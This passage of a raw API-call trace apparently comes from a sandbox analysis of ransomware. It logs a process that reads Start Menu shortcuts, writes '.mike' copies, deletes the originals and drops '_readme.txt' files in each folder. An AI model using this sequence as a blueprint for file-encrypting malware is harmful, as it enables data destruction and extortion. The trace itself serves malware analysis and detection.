dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.970] GetFileType (hFile=0x1c8) returned 0x1 [0158.970] GetFileType (hFile=0x1c8) returned 0x1 [0158.970] ReadFile (in: hFile=0x1c8, lpBuffer=0x22f2c14, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef18, lpOverlapped=0x0 | out: lpBuffer=0x22f2c14*, lpNumberOfBytesRead=0x2aef18*=0x4ea, lpOverlapped=0x0) returned 1 [0158.972] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.972] GetFileType (hFile=0x1c8) returned 0x1 [0158.973] GetFileType (hFile=0x1c8) returned 0x1 [0158.973] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x220 [0158.973] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.974] GetFileType (hFile=0x1c8) returned 0x1 [0158.974] GetFileType (hFile=0x1c8) returned 0x1 [0158.975] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk", dwFileAttributes=0x80) returned 1 [0158.975] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk")) returned 1 [0158.977] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.978] GetFileType (hFile=0x1c8) returned 0x1 [0158.978] GetFileType (hFile=0x1c8) returned 0x1 [0158.979] WriteFile (in: hFile=0x1c8, lpBuffer=0x20ff2a8*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aef50, lpOverlapped=0x0 | out: lpBuffer=0x20ff2a8*, lpNumberOfBytesWritten=0x2aef50*=0x45e, lpOverlapped=0x0) returned 1 [0158.980] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.981] GetFileType (hFile=0x1c8) returned 0x1 [0158.981] GetFileType (hFile=0x1c8) returned 0x1 [0158.981] CloseHandle (hObject=0x1c8) returned 1 [0158.981] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0158.982] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk", nBufferLength=0x105, lpBuffer=0x2aea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk", lpFilePart=0x0) returned 0x6d [0158.983] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.983] GetFileType (hFile=0x1c8) returned 0x1 [0158.983] GetFileType (hFile=0x1c8) returned 0x1 [0158.983] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x0 [0158.984] WriteFile (in: hFile=0x1c8, lpBuffer=0x2104020*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x2104020*, lpNumberOfBytesWritten=0x2aef0c*=0x220, lpOverlapped=0x0) returned 1 [0158.985] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.985] GetFileType (hFile=0x1c8) returned 0x1 [0158.986] GetFileType (hFile=0x1c8) returned 0x1 [0158.986] ReadFile (in: hFile=0x1c8, lpBuffer=0x2105198, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef18, lpOverlapped=0x0 | out: lpBuffer=0x2105198*, lpNumberOfBytesRead=0x2aef18*=0x4ee, lpOverlapped=0x0) returned 1 [0158.988] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.mike", nBufferLength=0x105, lpBuffer=0x2ae998, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.mike", lpFilePart=0x0) returned 0x72 [0158.988] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.988] GetFileType (hFile=0x1c8) returned 0x1 [0158.989] GetFileType (hFile=0x1c8) returned 0x1 [0158.989] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x220 [0158.989] WriteFile (in: hFile=0x1c8, lpBuffer=0x2109e18*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x2109e18*, lpNumberOfBytesWritten=0x2aef0c*=0x4f0, lpOverlapped=0x0) returned 1 [0158.990] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.990] GetFileType (hFile=0x1c8) returned 0x1 [0158.990] GetFileType (hFile=0x1c8) returned 0x1 [0158.991] WriteFile (in: hFile=0x1c8, lpBuffer=0x210d090*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aef3c, lpOverlapped=0x0 | out: lpBuffer=0x210d090*, lpNumberOfBytesWritten=0x2aef3c*=0x20c, lpOverlapped=0x0) returned 1 [0158.992] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk", dwFileAttributes=0x80) returned 1 [0158.992] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk")) returned 1 [0158.993] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.994] GetFileType (hFile=0x1c8) returned 0x1 [0158.994] GetFileType (hFile=0x1c8) returned 0x1 [0158.995] WriteFile (in: hFile=0x1c8, lpBuffer=0x2110a00*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aef50, lpOverlapped=0x0 | out: lpBuffer=0x2110a00*, lpNumberOfBytesWritten=0x2aef50*=0x45e, lpOverlapped=0x0) returned 1 [0158.996] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.997] GetFileType (hFile=0x1c8) returned 0x1 [0158.997] GetFileType (hFile=0x1c8) returned 0x1 [0158.997] CloseHandle (hObject=0x1c8) returned 1 [0158.997] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0158.998] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk", nBufferLength=0x105, lpBuffer=0x2aea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk", lpFilePart=0x0) returned 0x77 [0158.998] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.999] GetFileType (hFile=0x1c8) returned 0x1 [0158.999] GetFileType (hFile=0x1c8) returned 0x1 [0158.999] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x0 [0159.000] WriteFile (in: hFile=0x1c8, lpBuffer=0x2115994*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x2115994*, lpNumberOfBytesWritten=0x2aef0c*=0x220, lpOverlapped=0x0) returned 1 [0159.001] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.001] GetFileType (hFile=0x1c8) returned 0x1 [0159.001] GetFileType (hFile=0x1c8) returned 0x1 [0159.002] ReadFile (in: hFile=0x1c8, lpBuffer=0x2116b34, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef18, lpOverlapped=0x0 | out: lpBuffer=0x2116b34*, lpNumberOfBytesRead=0x2aef18*=0x4e2, lpOverlapped=0x0) returned 1 [0159.004] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.004] GetFileType (hFile=0x1c8) returned 0x1 [0159.004] GetFileType (hFile=0x1c8) returned 0x1 [0159.004] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x220 [0159.005] WriteFile (in: hFile=0x1c8, lpBuffer=0x211b7dc*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x211b7dc*, lpNumberOfBytesWritten=0x2aef0c*=0x4f0, lpOverlapped=0x0) returned 1 [0159.005] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.005] GetFileType (hFile=0x1c8) returned 0x1 [0159.006] GetFileType (hFile=0x1c8) returned 0x1 [0159.007] WriteFile (in: hFile=0x1c8, lpBuffer=0x211ea7c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aef3c, lpOverlapped=0x0 | out: lpBuffer=0x211ea7c*, lpNumberOfBytesWritten=0x2aef3c*=0x20c, lpOverlapped=0x0) returned 1 [0159.007] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk", dwFileAttributes=0x80) returned 1 [0159.008] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk")) returned 1 [0159.009] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0159.010] GetFileType (hFile=0x1c8) returned 0x1 [0159.010] GetFileType (hFile=0x1c8) returned 0x1 [0159.010] WriteFile (in: hFile=0x1c8, lpBuffer=0x2122504*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aef50, lpOverlapped=0x0 | out: lpBuffer=0x2122504*, lpNumberOfBytesWritten=0x2aef50*=0x45e, lpOverlapped=0x0) returned 1 [0159.015] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.015] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.016] CoTaskMemFree (pv=0x508980) [0159.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.020] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.021] GetFileType (hFile=0x1c8) returned 0x1 [0159.021] GetFileType (hFile=0x1c8) returned 0x1 [0159.021] CloseHandle (hObject=0x1c8) returned 1 [0159.022] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0159.022] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk", nBufferLength=0x105, lpBuffer=0x2aea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk", lpFilePart=0x0) returned 0x6c [0159.022] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.023] GetFileType (hFile=0x1c8) returned 0x1 [0159.023] GetFileType (hFile=0x1c8) returned 0x1 [0159.023] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x0 [0159.024] WriteFile (in: hFile=0x1c8, lpBuffer=0x212bb1c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x212bb1c*, lpNumberOfBytesWritten=0x2aef0c*=0x220, lpOverlapped=0x0) returned 1 [0159.025] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.025] GetFileType (hFile=0x1c8) returned 0x1 [0159.025] GetFileType (hFile=0x1c8) returned 0x1 [0159.026] ReadFile (in: hFile=0x1c8, lpBuffer=0x212cc94, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef18, lpOverlapped=0x0 | out: lpBuffer=0x212cc94*, lpNumberOfBytesRead=0x2aef18*=0x106, lpOverlapped=0x0) returned 1 [0159.027] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.mike", nBufferLength=0x105, lpBuffer=0x2ae998, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.mike", lpFilePart=0x0) returned 0x71 [0159.028] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.028] GetFileType (hFile=0x1c8) returned 0x1 [0159.028] GetFileType (hFile=0x1c8) returned 0x1 [0159.028] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x220 [0159.028] WriteFile (in: hFile=0x1c8, lpBuffer=0x21301d0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x21301d0*, lpNumberOfBytesWritten=0x2aef0c*=0x110, lpOverlapped=0x0) returned 1 [0159.029] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.030] GetFileType (hFile=0x1c8) returned 0x1 [0159.030] GetFileType (hFile=0x1c8) returned 0x1 [0159.031] WriteFile (in: hFile=0x1c8, lpBuffer=0x2133444*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aef3c, lpOverlapped=0x0 | out: lpBuffer=0x2133444*, lpNumberOfBytesWritten=0x2aef3c*=0x20c, lpOverlapped=0x0) returned 1 [0159.031] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk", dwFileAttributes=0x80) returned 1 [0159.032] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk")) returned 1 [0159.033] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0159.034] GetFileType (hFile=0x1c8) returned 0x1 [0159.034] GetFileType (hFile=0x1c8) returned 0x1 [0159.034] WriteFile (in: hFile=0x1c8, lpBuffer=0x2136d90*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aef50, lpOverlapped=0x0 | out: lpBuffer=0x2136d90*, lpNumberOfBytesWritten=0x2aef50*=0x45e, lpOverlapped=0x0) returned 1 [0159.035] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.037] GetFileType (hFile=0x1c8) returned 0x1 [0159.037] GetFileType (hFile=0x1c8) returned 0x1 [0159.037] CloseHandle (hObject=0x1c8) returned 1 [0159.037] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0159.038] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk", nBufferLength=0x105, lpBuffer=0x2aea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk", lpFilePart=0x0) returned 0x71 [0159.038] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.039] GetFileType (hFile=0x1c8) returned 0x1 [0159.039] GetFileType (hFile=0x1c8) returned 0x1 [0159.039] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x0 [0159.039] WriteFile (in: hFile=0x1c8, lpBuffer=0x213bbe0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x213bbe0*, lpNumberOfBytesWritten=0x2aef0c*=0x220, lpOverlapped=0x0) returned 1 [0159.041] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.041] GetFileType (hFile=0x1c8) returned 0x1 [0159.041] GetFileType (hFile=0x1c8) returned 0x1 [0159.041] ReadFile (in: hFile=0x1c8, lpBuffer=0x213cd68, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef18, lpOverlapped=0x0 | out: lpBuffer=0x213cd68*, lpNumberOfBytesRead=0x2aef18*=0x106, lpOverlapped=0x0) returned 1 [0159.043] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.mike", nBufferLength=0x105, lpBuffer=0x2ae998, lpFilePart=0x0 | out: 